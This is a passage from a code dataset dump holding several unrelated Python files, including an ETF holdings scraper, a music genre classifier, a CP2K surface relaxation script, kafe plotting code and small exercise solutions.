_is_etf(data):\n return data.loc['ETF']\n\n\ndef _convert_time(timestamp):\n timestamp = timestamp.replace('T', ' ')\n return datetime.fromisoformat(timestamp)\n\n\ndef _get_etf_data(ticker, data, holdings):\n response = _get_etf_page(ticker)\n if not _valid_request(response):\n 
logging.warning('Failed to get holdings for ticker %s: %s', ticker, response.status_code)\n return\n\n page_content = response.content\n pq = PyQuery(page_content)\n table = pq.find('#etfs-that-own')\n\n # use secondary data source if none available\n if not table:\n _get_etf_data_backup(ticker, data, holdings)\n return\n\n for row in table('tbody tr').items():\n columns = list(row('td').items())\n ticker = columns[0].children(\"a\").text()\n # disable the backup scraping because it is just too slow for larger funds\n holding_data = get_data(ticker, False)\n if holding_data is None:\n # fall back to getting name from scraped data\n name = columns[1].children(\"a\").text()\n else:\n # make use of official nasdaq data if available\n name = holding_data.loc['Security Name']\n\n weight = columns[2].text()\n weight = weight[:-1]\n holdings.append(Holding(name, ticker, weight))\n\n\ndef _get_etf_data_backup(ticker, data, holdings):\n response = _get_etf_page_backup(ticker)\n if not _valid_request(response):\n logging.warning('Failed to get holdings for ticker %s', ticker)\n return\n\n page_content = response.content\n title = data.loc['Security Name']\n\n url = _get_holdings_url(page_content)\n holdings_json = _make_request(url + str(0)).json()\n rows = holdings_json['total']\n # etfdb limits us to 15 tickers per page\n for i in range(0, rows, 15):\n for entry in holdings_json['rows']:\n holding = _get_etf_holding(entry)\n holdings.append(holding)\n holdings_json = _make_request(url + str(i + 15), throttle=0.7).json()\n\n\ndef _get_stock_data(ticker, data, holdings):\n title = data.loc['Security Name']\n holding = Holding(title, ticker)\n holdings.append(holding)\n\n\ndef _get_etf_page(ticker):\n url = 'https://etfdailynews.com/etf/{0}/'.format(ticker)\n return _make_request(url, redirects=False)\n\n\ndef _get_etf_page_backup(ticker):\n url = 'https://etfdb.com/etf/{0}/'.format(ticker)\n return _make_request(url, redirects=False)\n\n\ndef _get_ticker_image(ticker):\n return 'https://storage.googleapis.com/iex/api/logos/{0}.png'.format(ticker)\n\n\ndef _get_iex_data(tickers, options, settings=None):\n data = {}\n options = \",\".join(options)\n if settings:\n options = options + (\"&\" + \"&\".join(settings))\n for i in range(0, len(tickers), 100):\n subset = \",\".join(tickers[i:i+100])\n url = 'https://api.iextrading.com/1.0/stock/market/batch?symbols={0}&types={1}'.format(subset, options)\n data.update(_make_request(url, redirects=False).json())\n return data\n\n\ndef _make_request(url, redirects=True, throttle=0.0):\n response = None\n try:\n response = requests.get(url, hooks={'response': _throttle_hook(\n throttle)}, allow_redirects=redirects, timeout=3)\n except requests.exceptions.RequestException as e:\n raise ValueError('Request exception') from e\n return response\n\n\n# returns response hook function which sleeps for\n# timeout if the response is not yet cached\ndef _throttle_hook(timeout):\n def hook(response, *args, **kwargs):\n if not getattr(response, 'from_cache', False):\n time.sleep(timeout)\n return response\n return hook\n\n\ndef _valid_request(response):\n return response.status_code == requests.codes.ok\n\n\ndef _get_holdings_url(content):\n pq = PyQuery(content)\n url = 'https://etfdb.com/'\n sort = '&sort=weight&order=desc&limit=15&offset='\n url += pq(\"table[data-hash='etf-holdings']\").attr('data-url') + sort\n return url\n\n\ndef _get_etf_holding(entry):\n name = ticker = ''\n data = entry['holding']\n pq = PyQuery(data)\n\n # handle normal cases of actual stocks\n if 
pq('a').length:\n ticker = pq('a').attr('href').split('/')[2].split(':')[0]\n holding_data = get_data(ticker, False)\n if holding_data is None:\n # fall back to getting name from scraped data\n name = pq('a').text().split('(')[0]\n else:\n # make use of official nasdaq data if available\n name = holding_data.loc['Security Name']\n # handle special underlyings e.g. VIX futures\n elif pq('span').eq(2).length:\n name = data\n ticker = pq('span').eq(2).text()\n # handle further special cases e.g. Cash components, Hogs, Cattle\n else:\n name = data\n ticker = data\n weight = entry['weight'][:-1]\n return Holding(name, ticker, weight)\n\n\ndef _get_data_from_yahoo(ticker):\n scraped_data = yahoo_scraper.get_data(ticker)\n\n data_dict = {}\n\n try:\n data_dict['Yahoo'] = (scraped_data.source == \"Yahoo\")\n data_dict['Price'] = _round_price(scraped_data.price)\n data_dict['Currency'] = scraped_data.currency\n data_dict['Security Name'] = scraped_data.name\n data_dict['ETF'] = scraped_data.etf\n data = pd.Series(data_dict)\n except AttributeError:\n logging.warning(\"No valid data found for \" + ticker)\n\n return scraped_data if (scraped_data is None) else data\n\n\ndef _get_company_from_yahoo(ticker):\n data = yahoo_scraper.get_company_data(ticker)\n\n data_dict = {'company': {'symbol': ticker}}\n\n try:\n company = data_dict['company']\n company['companyName'] = data.name\n company['exchange'] = data.exchange\n company['industry'] = data.industry\n company['website'] = data.website\n company['description'] = data.description\n company['CEO'] = ''\n company['issueType'] = ''\n company['sector'] = data.sector\n company['tags'] = []\n except AttributeError:\n logging.warning(\"No valid company data found for \" + ticker)\n\n return data if (data is None) else data_dict\n\n\ndef to_usd(amount, base_currency_symbol):\n temp_amount = amount\n if base_currency_symbol == '€':\n temp_amount = usd_converter.convert('EUR', amount)\n elif base_currency_symbol == '¥':\n temp_amount = usd_converter.convert('JPY', amount)\n # expandable for a lot of different currencies\n else:\n logging.warning(\"Requested conversion from unknown currency symbol \" + base_currency_symbol +\n \" to USD. 
Using 1:1 conversion.\")\n return amount if (temp_amount is None) else temp_amount\n","sub_path":"etfcalc/util/webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":9826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233816825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 18 21:52:30 2017\n\n@author: roy\n\"\"\"\nimport os\nimport pandas as pd\n\npath_dir= '/home/roy/classes/simulator/data_collect/data'\n\ndriving_info = pd.read_csv(os.path.join(path_dir, 'driving_log.csv'))\n\none_object = driving_info.ix[1]\nprint(type(one_object))\nprint(driving_info.ix[1]['steering'])\nprint(driving_info.shape)","sub_path":"pandas_test.py","file_name":"pandas_test.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"376847849","text":"from __future__ import unicode_literals\nimport warnings\nimport os\n\nwarnings.filterwarnings('ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore', module='librosa')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport pickle\nimport sys\nimport tempfile\nimport time\nimport librosa\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport simpleaudio as sa\nimport tensorflow as tf\nimport youtube_dl\nfrom PIL import Image\nfrom scipy.io.wavfile import write\nfrom eyed3 import id3\n\nIMG_PIXELS = 67000\nIMG_WIDTH = 335\nIMG_HEIGHT = 200\nNUM_LABELS = 32\nMIN_CLIP_LENGTH = 29\nNUM_FEATURES = 44\nNUM_MFCC_COEFF = 20\nSONG_EXT = 'mp3'\nLABELS_DICT = pd.read_csv('./labels_key.csv')['category']\nFEATURE_COLS = pd.read_csv('./feature_cols.csv')['feature_columns']\n\n\nclass Song:\n def __init__(self):\n self.path = None\n self.clips = []\n self.features = []\n self.spectrograms = []\n self.sr = None\n self.genre_prediction = []\n self.title = None\n self.artist = None\n\n def get_predictions(self):\n return self.genre_prediction\n\n @staticmethod\n def __add_to_series(ds, name, values):\n \"\"\" Calculates mean, min, max, and std deviation of each list of values passed to function,\n then stores value in the data series\n :param pandas.Series ds: Data series that will store audio feature data\n :param string name: name of extracted feature. 
Must match column header\n :param list values: python list of audio extracted data from librosa\n \"\"\"\n # set mean of values\n ds['{}-mean'.format(name)] = np.mean(values)\n # set min of values\n ds['{}-min'.format(name)] = np.min(values)\n # set max of values\n ds['{}-max'.format(name)] = np.max(values)\n # set std of values\n ds['{}-std'.format(name)] = np.std(values)\n\n def __get_features(self, source, sr):\n \"\"\" Calls librosa library to extract audio feature data then stores in pandas data series\n :param string source: path to audio file\n :param string sr: name of audio file\n \"\"\"\n # ignore librosa warning regarding PySoundFile\n warnings.filterwarnings('ignore', module='librosa')\n\n try:\n # define panda series to hold song data\n ds = pd.Series(index=FEATURE_COLS, dtype=np.float32)\n # extract specral features\n self.__add_to_series(ds, 'chroma_stft', librosa.feature.chroma_stft(y=source, sr=sr))\n self.__add_to_series(ds, 'rms', librosa.feature.rms(y=source))\n self.__add_to_series(ds, 'spec_cent', librosa.feature.spectral_centroid(y=source, sr=sr))\n self.__add_to_series(ds, 'spec_bw', librosa.feature.spectral_bandwidth(y=source, sr=sr))\n self.__add_to_series(ds, 'spec_rolloff', librosa.feature.spectral_rolloff(y=source, sr=sr))\n self.__add_to_series(ds, 'zcr', librosa.feature.zero_crossing_rate(source))\n\n # add mfcc spectral coefficients\n mfcc = librosa.feature.mfcc(y=source, sr=sr, n_mfcc=NUM_MFCC_COEFF)\n for count, e in enumerate(mfcc, start=0):\n ds['mfcc{}'.format(count)] = np.mean(e)\n\n return ds\n\n except Exception as e:\n print('ERROR: {}'.format(repr(e)))\n\n def __extract_features(self, source, sr):\n \"\"\" Extract feture data from audio source using genreml\n :param source: raw audio data\n :param sr: sampling rate of audio data\n :returns array of feature data scaled and sorted based on FEATURE_COLS list\n \"\"\"\n features = self.__get_features(source, sr)\n features_sorted = []\n for col in FEATURE_COLS:\n features_sorted.append(features[col])\n features_sorted = np.array(features_sorted)\n features_sorted = features_sorted[np.newaxis, :]\n\n # load scaler object from binary exported from trained data\n sc = pickle.load(open('./std_scaler_B.pkl', 'rb'))\n features = sc.transform(features_sorted)[0]\n return features\n\n @staticmethod\n def __extract_spectrogram(source, sr, output_path, output_name):\n \"\"\" Extract spectrogram data from audio source using librosa package\n :param source: raw audio data\n :param sr: sampling rate of audio data\n :param output_path: path to ouput spectrogram image file\n :param output_name: name that will be given to spectrogram image file\n :returns pixel data of spectrogram image generated from audio data\n \"\"\"\n # generate mel-spectrogram image data from clip\n spect_path = f'{output_path}/img{output_name}'\n mel_spect = librosa.feature.melspectrogram(y=source, sr=sr, n_fft=2048, hop_length=1024)\n mel_spect = librosa.power_to_db(mel_spect, ref=np.max)\n\n # normalize image between min and max\n img = 255 * ((mel_spect - mel_spect.min()) /\n (mel_spect.max() - mel_spect.min()))\n\n # convert pixel values to 8 bit ints\n img = img.astype(np.uint8)\n\n # flip and invert image\n img = np.flip(img, axis=0)\n img = 255 - img\n\n # create and export\n fig = plt.figure(frameon=False)\n ax = plt.Axes(fig, [0., 0., 1., 1.])\n ax.set_axis_off()\n fig.add_axes(ax)\n ax.imshow(img, aspect='auto', cmap='Greys')\n fig.savefig(spect_path)\n plt.close(fig)\n\n # open .png file and return raw pixel data\n spect_img = 
Image.open(f'{spect_path}.png').convert('L')\n spect_img = spect_img.resize((IMG_WIDTH, IMG_HEIGHT))\n spect_img = list(spect_img.getdata())\n return spect_img\n\n def download_song(self, url, output_path):\n \"\"\" Uses youtuble-dl package to download and extrat audio data from youtube url\n :param url: Valid youtuble url\n :param output_path: Output path to store audio file\n \"\"\"\n\n def path_hook(d):\n if not self.path:\n file = d['filename'].split('.')[0]\n self.path = f'{file}.{SONG_EXT}'\n\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'outtmpl': output_path + '/%(title)s.%(ext)s',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': SONG_EXT,\n 'preferredquality': '192',\n },\n {'key': 'FFmpegMetadata'}\n ],\n 'progress_hooks': [path_hook],\n 'keepvideo': True\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n\n def play_clips(self):\n \"\"\" Function loops through and plays each audio clip from self.clips array\n \"\"\"\n count = 1\n filename = 'test.wav'\n for clip in self.clips:\n # export wav file\n scaled = np.int16(clip / np.max(np.abs(clip)) * 32767)\n write(filename, self.sr, scaled)\n wave_obj = sa.WaveObject.from_wave_file(filename)\n\n # play wav file\n print(f'Playing clip #{count}')\n play_obj = wave_obj.play()\n play_obj.wait_done()\n\n # Wait 2 seconds before playing next clip\n time.sleep(2)\n count += 1\n\n # delete wav file\n os.remove(filename)\n\n def extract_song_data(self):\n \"\"\" Clips song from raw audio data based on length of song:\n If song greater than 90sec, method will clip three 29sec sections from the middle of the song\n If song less than 90sec, only middle 29sec clip extracted\n If less than 29sec, error is thrown\n \"\"\"\n y, sr = librosa.load(self.path)\n self.sr = sr\n\n # length of song in seconds\n length = len(y) / sr\n\n # assert song length greater than or equal to minimum\n if length < MIN_CLIP_LENGTH:\n raise Exception('Song length too short for accurate prediction')\n\n # if length of song less than 3 * MIN_CLIP_LENGTH, take middle section\n elif length < MIN_CLIP_LENGTH * 3 + 1:\n mid_index = int(len(y) / 2)\n lower_index = mid_index - int(sr * MIN_CLIP_LENGTH / 2)\n upper_index = lower_index + int(sr * MIN_CLIP_LENGTH)\n self.clips.append(y[lower_index:upper_index])\n\n # else split song into three clips each at MIN_CLIP_LENGTH in duration\n else:\n num_clips = 3\n mid_index = int(len(y) / 2)\n lower_index = mid_index - int(\n sr * (MIN_CLIP_LENGTH * num_clips / 2))\n\n for i in range(num_clips):\n upper_index = lower_index + int(sr * MIN_CLIP_LENGTH)\n self.clips.append(y[lower_index:upper_index])\n lower_index = upper_index\n\n # get song title and artist if avaliable\n tag = id3.Tag()\n tag.parse(self.path)\n self.title = tag.title\n self.artist = tag.artist\n\n def extract_feature_data(self, spect_output_path: str):\n \"\"\" Method to extract feature data and spectrogram image file from each audio clip in self.clips\n :param spect_output_path: Output file path for spectrogram image file\n \"\"\"\n # loop through each track section and get prediction\n print(f'Extracting data from audio file...')\n count = 1\n for clip in self.clips:\n self.features.append(self.__extract_features(clip, self.sr))\n self.spectrograms.append(self.__extract_spectrogram(clip, self.sr, spect_output_path, count))\n count += 1\n\n def predict(self):\n \"\"\" Prediction method that loops through each clip in self.clips and runs ML prediction model to\n classify song into categories defined in LABELS_DICT\n 
\"\"\"\n print(f'Running prediction model...')\n self.genre_prediction = np.array(\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n dtype=np.float64)\n # model = tf.keras.models.load_model('FMA_model.h5')\n model = tf.keras.models.load_model('FMA_model_seperate_genres.h5')\n count = 0\n for image, features in zip(self.spectrograms, self.features):\n count += 1\n # get prediction for each clip and and calculate average\n image = np.array(image).reshape(IMG_HEIGHT, IMG_WIDTH, 1)\n features = np.array(features)\n prediction = model.predict([np.array([features]), np.array([image])])\n self.genre_prediction += prediction[0]\n\n # calculate average of each clip prediction\n self.genre_prediction = self.genre_prediction / count\n\n\ndef main(dl_type, url_path, n):\n song = Song()\n with tempfile.TemporaryDirectory() as tmp:\n print(f'Created temporary directory: {tmp}')\n\n try:\n # download song from youtube ('-y') or get local ('-l') file\n if dl_type == '-y':\n song.download_song(url_path, tmp)\n elif dl_type == '-l':\n song.path = url_path\n else:\n raise Exception(\n 'Invalid Input: -y (youtube url) or -l (local file) must be before url or path')\n\n # extract raw audio data from song and section according to length\n song.extract_song_data()\n\n # ====== CAREFUL WITH SYSTEM VOLUME!! ======\n # song.play_clips()\n\n # get feature data and spectrogram images from each clip\n song.extract_feature_data(tmp)\n\n # get top-n genre prediction\n song.predict()\n\n # log top-n genres to console\n prediction_arr = song.get_predictions()\n\n # Log top n predictions to console\n n = int(n)\n top_n_genres = []\n top_n = np.argsort(prediction_arr)\n top_n = top_n[::-1][:n]\n for i, val in enumerate(top_n, start=1):\n top_n_genres.append(LABELS_DICT[val])\n print(f'Top {n} classified genres for ', os.path.splitext(os.path.basename(song.path))[0])\n print(top_n_genres)\n sys.stderr.write(os.path.splitext(os.path.basename(song.path))[0] + ', ' + ', '.join(top_n_genres))\n\n except Exception as e:\n print('ERROR: {}'.format(repr(e)))\n return\n\n\nif __name__ == \"__main__\":\n assert(len(sys.argv) == 4)\n assert(0 < int(sys.argv[3]) < 33)\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"aws_containers/fma_predictor/audio_classifier.py","file_name":"audio_classifier.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"359104244","text":"l = eval(input('Enter the list containing number between 1 to 12'))\n\nfor i in range(len(l)):\n if l[i] > 10:\n del(l[i])\n l.insert(i,10)\n\n \n\n\n\n\nprint(l)\n","sub_path":"py.py","file_name":"py.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"48656870","text":"#!/usr/bin/env python\nfrom xcp2k import CP2K\nfrom ase.build import surface\nfrom ase.constraints import FixAtoms\nfrom ase import Atoms, Atom\nfrom ase.io import write, read\nfrom ase.visualize import view\nfrom multiprocessing import Pool\nimport os\nimport numpy as np\nimport time\n\ndef sortz(atoms):\n tags = atoms.positions[:,2]\n deco = sorted([(tag, i) for i, tag in enumerate(tags)])\n indices = [i for tag, i in deco]\n return atoms[indices]\n\n#===============================================================================\na = 15.865/4\nxyz = a/2\n#atoms = read('~/xcp2k/bulks/pt-relax/relax/')\nbulk = Atoms([Atom('Pt', (0.0, 0.0, 0.0)),\n 
Atom('Pt', (xyz, xyz, 0.0)),\n Atom('Pt', (xyz, 0.0, xyz)),\n Atom('Pt', (0.0, xyz, xyz))])\nbulk.cell= a * np.array([[1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [0.0, 0.0, 1.0]])\natoms = surface(bulk, (1, 1, 1), 4, vacuum=0.0)\natoms = atoms*[4, 4, 1]\natoms.pbc = [True, True, True]\nconstraint = FixAtoms(mask=[atom.position[2] < 3\n for atom in atoms])\natoms.set_constraint(constraint)\natoms.cell[2][2] = 25\natoms = sortz(atoms)\n#view(atoms)\natoms.write('datas/relax.in')\n#===============================================================================\ncalc = CP2K(cpu = 24)\n#===============================================================================\nCP2K_INPUT = calc.CP2K_INPUT # This is the root of the input tree\nGLOBAL = CP2K_INPUT.GLOBAL\nMOTION = CP2K_INPUT.MOTION\nFORCE_EVAL = CP2K_INPUT.FORCE_EVAL_add()\nSUBSYS = FORCE_EVAL.SUBSYS\nDFT = FORCE_EVAL.DFT\nSCF = DFT.SCF\n#===============================================================================\nGLOBAL.Run_type = \"GEO_OPT\" # energy_force, geo_opt, cell_opt\nGLOBAL.Print_level = \"MEDIUM\"\n\nFORCE_EVAL.Method = \"Quickstep\"\nFORCE_EVAL.Stress_tensor = 'ANALYTICAL'\nFORCE_EVAL.PRINT.FORCES.Section_parameters = \"ON\"\nFORCE_EVAL.PRINT.STRESS_TENSOR.Section_parameters = \"ON\"\n\nDFT.Basis_set_file_name = \"BASIS_MOLOPT\"\nDFT.Potential_file_name = \"POTENTIAL\"\nDFT.Charge = 0\n#DFT.Multiplicity = 1\nDFT.Uks = True\n\n\n#DFT.Surface_dipole_correction = True\n#DFT.Surf_dip_dir = 'Z'\n\nDFT.MGRID.Ngrids = 4\nDFT.MGRID.Cutoff = 500\nRS_GRID_add = DFT.MGRID.RS_GRID_add()\nRS_GRID_add.Distribution_type = 'DISTRIBUTED'\n\nDFT.XC.XC_FUNCTIONAL.Section_parameters = \"PBE\"\n#DFT.XC.XC_GRID.Xc_smooth_rho = 'NN50' # The density smoothing used for the xc calculation\n#DFT.XC.XC_GRID.Xc_deriv = 'NN50_SMOOTH' # The method used to compute the derivatives\n\n#DFT.POISSON.Periodic = 'XYZ'\n\n#DFT.QS.Method = 'GPW'\n#DFT.QS.Eps_default = 1.0E-12\n#DFT.QS.Map_consistent = True # Compute the exact derivative (Hks) of the energy with respect to the density matrix. 
\n#DFT.QS.Extrapolation = 'ASPC' # Extrapolation strategy for the wavefunction\n#DFT.QS.Extrapolation_order = 3 # Higher order might bring more accuracy, but comes, for large systems, also at some cost.\n\nSCF.Scf_guess = \"ATOMIC\"\nSCF.Eps_diis = 0.1\nSCF.Eps_scf = 1.0E-6\nSCF.Max_scf = 50\nSCF.OUTER_SCF.Eps_scf = 1.0E-6\nSCF.OUTER_SCF.Max_scf = 20\n\nSCF.Added_mos = 500\nSCF.SMEAR.Electronic_temperature = 300\nSCF.SMEAR.Method = 'FERMI_DIRAC'\n\nSCF.DIAGONALIZATION.Algorithm = 'STANDARD'\nSCF.MIXING.Method = 'BROYDEN_MIXING'\nSCF.MIXING.Alpha = 0.1\nSCF.MIXING.Beta = 1.5\nSCF.MIXING.Nbuffer = 8\n\nKIND = SUBSYS.KIND_add('Pt') # Section_parameters can be provided as argument.\nKIND.Element = 'Pt'\nKIND.Basis_set = \"DZVP-MOLOPT-SR-GTH\"\nKIND.Potential = 'GTH-PBE'\n\n#DFT.PRINT.PDOS.Nlumo = 900\n#DFT.PRINT.PDOS.EACH.Qs_scf = 0\n#DFT.PRINT.PDOS.EACH.Geo_opt = 0\n#DFT.PRINT.PDOS.EACH.Md = 0\n#DFT.PRINT.PDOS.Add_last = 'NUMERIC'\n#===============================================================================\n#view(atoms)\n#print(len(atoms))\n#calc.mode = 1\ncalc.directory = 'relax/444'\ncalc.prefix = 'pt'\ncalc.results = {}\ncalc.CP2K_INPUT.MOTION.CONSTRAINT.FIXED_ATOMS_list = []\n#===============================================================================\natoms.set_calculator(calc)\n###calc.write_input_file()\ne = atoms.get_potential_energy()\nt = calc.get_time()\nprint(' {0} {1}'.format( t, e))\n#===============================================================================\n","sub_path":"xcp2k/surfaces/pt/relax.py","file_name":"relax.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"310454469","text":"import math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import defaultdict\n\n# Complete the freqQuery function below.\n\n\ndef freqQuery(queries):\n count = defaultdict(int)\n data = defaultdict(int)\n output = []\n for idx, item in enumerate(queries):\n if item[0] == 1:\n count[data[item[1]]] -= 1\n data[item[1]] += 1\n count[data[item[1]]] += 1\n\n elif item[0] == 2:\n if data[item[1]] > 0:\n count[data[item[1]]] -= 1\n data[item[1]] -= 1\n count[data[item[1]]] += 1\n\n elif item[0] == 3:\n if count[item[1]] > 0:\n output.append(1)\n else:\n output.append(0)\n return output\n\nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input().strip())\n\n queries = []\n\n for _ in range(q):\n queries.append(list(map(int, input().rstrip().split())))\n\n ans = freqQuery(queries)\n\n print(ans)\n\n # fptr.write('\\n'.join(map(str, ans)))\n # fptr.write('\\n')\n\n # fptr.close()\n","sub_path":"Dictionaries and Hash-maps/frequencyQueries.py","file_name":"frequencyQueries.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"644413226","text":"from microservice import MicroService\nfrom modules.server import Server\n\nclass MainService(MicroService):\n def __init__(self):\n super().__init__('main.log', 'main.pid', 'config.yml')\n\n server = Server(\n self.config['servconf'], self.config['dbconf'],\n self.config['uniconf'], self.config['goipconf'])\n server.start()\n\nif __name__ == \"__main__\":\n service = MainService()","sub_path":"mainservice.py","file_name":"mainservice.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 
+{"seq_id":"646240353","text":"import config as cfg\r\nimport tensorflow as tf\r\nfrom tensorflow.contrib import slim\r\n\r\ndef conv_net(x, is_training):\r\n batch_norm_params = {\"is_training\": is_training, \"decay\": 0.9, \"updates_collections\": None}\r\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\r\n activation_fn=tf.nn.relu,\r\n weights_initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.01),\r\n weights_regularizer=slim.l2_regularizer(0.0005),\r\n normalizer_fn=slim.batch_norm, normalizer_params=batch_norm_params):\r\n with tf.variable_scope(\"ConvNet\", reuse=tf.AUTO_REUSE):\r\n x = tf.reshape(x, [-1, 28, 28, 1])\r\n net = slim.conv2d(x, 6, [5, 5], scope=\"conv_1\")\r\n net = slim.max_pool2d(net, [2, 2], scope=\"pool_1\")\r\n net = slim.conv2d(net, 12, [5, 5], scope=\"conv_2\")\r\n net = slim.max_pool2d(net, [2, 2], scope=\"pool_2\")\r\n net = slim.flatten(net, scope=\"flatten\")\r\n net = slim.fully_connected(net, 100, scope=\"fc\")\r\n net = slim.dropout(net, is_training=is_training)\r\n net = slim.fully_connected(net, cfg.num_classes, scope=\"prob\", activation_fn=None, normalizer_fn=None)\r\n return net","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"605228511","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport evaluate\nimport argparse\nimport ma_util\nimport csv\n\n\ndef main(goldFile, predFile, outCSVFile):\n header = []\n data = []\n atN = evaluate.accuracyAtN(goldFile, predFile, ma_util.GRANULARITY_COARSE)\n for key in sorted(atN.keys()):\n header.append('Acc at %s' % key)\n data.append(atN[key][0])\n header.append('Support at %s' % key)\n data.append(atN[key][1])\n outFH = open(outCSVFile, 'w')\n writer = csv.writer(outFH)\n writer.writerow(header)\n writer.writerow(data)\n outFH.close()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Evaluate system output against a gold standard.')\n parser.add_argument('--gold', required=True,\n help='Gold PTB file')\n parser.add_argument('--predicted', required=True,\n help='System output (PTB file)')\n parser.add_argument('--output-file', required=True,\n help='Where to store CSV results.')\n args = parser.parse_args()\n main(args.gold, args.predicted, args.output_file)\n","sub_path":"shared/evaluate_at_length.py","file_name":"evaluate_at_length.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"574717531","text":"'''\nA Tale of Two Fits\n------------------\n\n This simple example demonstrates the fitting of a linear function to\n two Datasets and plots both Fits into the same Plot.\n'''\n\n###########\n# Imports #\n###########\n\n# import everything we need from kafe\nimport kafe\n\n# additionally, import the model function we\n# want to fit:\nfrom kafe.function_library import linear_2par\n\n############\n# Workflow #\n############\n\n# Initialize the Datasets\nmy_datasets = [kafe.Dataset(title=\"Ohne Gewicht\", axis_labels=['Drehfrequenz', 'Nutationsfrequenz'], axis_units=['Hz', 'Hz']),\n kafe.Dataset(title=\"Mit Gewicht\", axis_labels=['Drehfrequenz', 'Nutationsfrequenz'], axis_units=['Hz', 'Hz'])]\n\n# Load the Datasets from files\nmy_datasets[0].read_from_file(input_file='../messwerte/3_ohne_gewicht.dat')\nmy_datasets[1].read_from_file(input_file='../messwerte/3_mit_gewicht.dat')\n\n# Create the Fits\nfit1 = 
kafe.Fit(my_datasets[0], linear_2par, fit_label=\"Lineare Regression ohne Gewicht\")\n\nfit2 = kafe.Fit(my_datasets[1], linear_2par, fit_label=\"Lineare Regression mit Gewicht\")\n\nmy_fits = [fit1, fit2]\n\n# Do the Fits\nfor fit in my_fits:\n fit.do_fit(quiet=True)\n\n# Create the plots\nmy_plot = kafe.Plot(my_fits[0], my_fits[1], axis_labels=['Drehfrequenz [Hz]', 'Nutationsfrequenz [Hz]'])\n\n# Draw the plots\nmy_plot.plot_all(show_band_for='all')\n\n###############\n# Plot output #\n###############\n\n# Save the plots\nmy_plot.save('fig_aufgabe_3.pdf')\n\n# Show the plots\nmy_plot.show()\n","sub_path":"71_kreisel/python/two_linear_fits.py","file_name":"two_linear_fits.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"4704463","text":"def two_sum(ls, ex_sum):\n if (ls is None) or (ex_sum is None):\n raise TypeError\n if len(ls) == 0:\n raise ValueError\n # collect the indices of every pair of distinct elements summing to ex_sum;\n # enumerate avoids the list.index first-occurrence bug with duplicate values\n seen = set()\n for index1, ele1 in enumerate(ls):\n for index2, ele2 in enumerate(ls):\n if index1 != index2 and ele1 + ele2 == ex_sum:\n print(ele1, ele2)\n seen.add(index1)\n seen.add(index2)\n return sorted(seen)\n\n\n#print(two_sum([1,3,2,-7,5],7))\n#two_sum(None,None)\n#print(a, type(a))\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"151635256","text":"'''\nThis runs random search to find the optimized hyper-parameters using cross-validation\n\nINPUTS:\n - OUT_ITERATION: # of training/testing splits\n - RS_ITERATION: # of random search iterations\n - data_mode: mode to select the time-to-event data from \"import_data.py\"\n - seed: random seed for training/testing/validation splits\n - EVAL_TIMES: list of time-horizons at which the performance is maximized; \n the validation is performed at given EVAL_TIMES (e.g., [12, 24, 36])\n\nOUTPUTS:\n - \"hyperparameters_log.txt\" is the output\n - Once the hyperparameters are optimized, run \"summarize_results.py\" to get the final results.\n'''\nimport time, datetime, os\nimport get_main\nimport numpy as np\n\nimport import_data as impt\n\n\n# this saves the current hyperparameters\ndef save_logging(dictionary, log_name):\n with open(log_name, 'w') as f:\n for key, value in dictionary.items():\n f.write('%s:%s\\n' % (key, value))\n\n\n# this opens and loads the saved hyperparameters\ndef load_logging(filename):\n data = dict()\n with open(filename) as f:\n def is_float(input):\n try:\n num = float(input)\n except ValueError:\n return False\n return True\n\n for line in f.readlines():\n if ':' in line:\n key, value = line.strip().split(':', 1)\n if value.isdigit():\n data[key] = int(value)\n elif is_float(value):\n data[key] = float(value)\n elif value == 'None':\n data[key] = None\n else:\n data[key] = value\n else:\n pass # deal with bad lines of text here\n return data\n\n\n# this randomly selects hyperparameters based on the given list of candidates\ndef get_random_hyperparameters(out_path):\n SET_BATCH_SIZE = 